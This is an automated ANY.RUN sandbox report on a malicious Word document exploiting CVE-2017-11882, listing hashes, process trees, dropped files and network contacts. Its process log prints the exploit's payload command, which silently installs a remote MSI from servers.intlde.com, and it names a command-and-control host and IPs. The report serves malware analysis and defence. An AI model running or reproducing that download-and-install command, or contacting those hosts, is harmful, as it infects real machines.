analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SOA_File_17052019.docx

Full analysis: https://app.any.run/tasks/8da838dd-5ef7-4a45-9d63-ea7ad5d2e9bf
Verdict: Malicious activity
Analysis date: May 20, 2019, 06:04:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

2D49AC3E13B74DF4C3892E6889AB2E21

SHA1:

F1A360822C2828F9165143CA59E1C67837671903

SHA256:

FDEC22B9DE8580661228149F50D3207605372FA0F880C2B45D05F715702B1F7D

SSDEEP:

384:X6ma3W6PYcpf4MS+pG7hvWvRG95OQJJflgI4yFJexEtxI:qmURPYchg5mRG95OQJJfWxTiI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3824)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2076)
    • Application was dropped or rewritten from another process

      • images.exe (PID: 3692)
      • images.exe (PID: 1668)
    • Changes the autorun value in the registry

      • MSI8CBA.tmp (PID: 3204)
    • Application was injected by another process

      • explorer.exe (PID: 116)
    • Runs injected code in another process

      • images.exe (PID: 1668)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3824)
    • Executed via COM

      • EQNEDT32.EXE (PID: 3824)
      • EQNEDT32.EXE (PID: 3244)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1664)
      • MSI8CBA.tmp (PID: 3204)
    • Creates files in the user directory

      • MSI8CBA.tmp (PID: 3204)
    • Starts itself from another location

      • MSI8CBA.tmp (PID: 3204)
    • Application launched itself

      • images.exe (PID: 3692)
  • INFO

    • Starts Microsoft Office Application

      • explorer.exe (PID: 116)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3288)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3288)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3824)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1664)
      • MSI8CBA.tmp (PID: 1716)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1664)
    • Application was dropped or rewritten from another process

      • MSI8CBA.tmp (PID: 1716)
      • MSI8CBA.tmp (PID: 3204)
    • Application launched itself

      • MSI8CBA.tmp (PID: 1716)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2c2fab17
ZipCompressedSize: 350
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2019:05:16 12:01:00Z
ModifyDate: 2019:05:16 12:01:00Z

XMP

Title: -
Subject: -
Creator: Richard
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
11
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start inject winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msi8cba.tmp no specs msi8cba.tmp images.exe no specs images.exe explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
3288"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\SOA_File_17052019.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3824"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2076cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4040msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1664C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3244"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1716"C:\Windows\Installer\MSI8CBA.tmp"C:\Windows\Installer\MSI8CBA.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3204"C:\Windows\Installer\MSI8CBA.tmp"C:\Windows\Installer\MSI8CBA.tmp
MSI8CBA.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3692"C:\Users\admin\AppData\Roaming\images.exe"C:\Users\admin\AppData\Roaming\images.exeMSI8CBA.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1668"C:\Users\admin\AppData\Roaming\images.exe"C:\Users\admin\AppData\Roaming\images.exe
images.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 345
Read events
1 082
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
27
Text files
15
Unknown types
5

Dropped files

PID
Process
Filename
Type
3288WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREE83.tmp.cvr
MD5:
SHA256:
3288WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{B7750C41-1DB3-4404-A8F0-F7571B65F1B2}
MD5:
SHA256:
3288WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{01674BD9-01DA-47C8-8F3E-5B619C8C74F7}
MD5:
SHA256:
3288WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:E1A3C17723AD5C8A28B1D01815D4C2F5
SHA256:FFCBBE486DEFCCDE79D75BD15E8055429F27544A36109F5C3CF1A9E6AEA02988
3288WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$A_File_17052019.docxpgc
MD5:3138A58A118FA55FF4116CB16EA7A37A
SHA256:D9A7C8AB340827CB85F92C3C31DA8E4D674925C0B813E49519BD9295533B3553
3288WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:F7D0BD7E2FCB8D50BCCCD8D9521316D0
SHA256:9DD0DB39E900F8CE1621B4AF4054630CE71C467C1108382DEA7460D77DB178CA
3288WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C111F99CD469831004E4547E39009B06
SHA256:3479C3CB813B5D1C331B8400A690378D71DF89F98184E62788F05713D903F6AF
3288WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7D4DC85E-A55F-46CA-B4E3-B90AF5782B41}.FSDbinary
MD5:C3901F3C6094EE07A8C3DE67A0ED4FF7
SHA256:1C0A9B30E6B9D7C6FFE7C4F82131759CCA35C0017ACAE3252D56C673A7DC133F
3288WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:8FB8E47719AF75543169A7F29F445173
SHA256:290977F9F4BEE59AAAA6F3049CBC8994760E9DF5F0D3952D5345715A6433ECAA
1664msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFD5C0AB5148F3F564.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
50
DNS requests
6
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
972
svchost.exe
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown
3288
WINWORD.EXE
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown
1664
msiexec.exe
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown
1668
images.exe
88.202.177.235:5200
fada101.servehttp.com
UK-2 Limited
NL
malicious

DNS requests

Domain
IP
Reputation
servers.intlde.com
  • 198.252.108.62
unknown
fada101.servehttp.com
  • 88.202.177.235
malicious

Threats

No threats detected
No debug info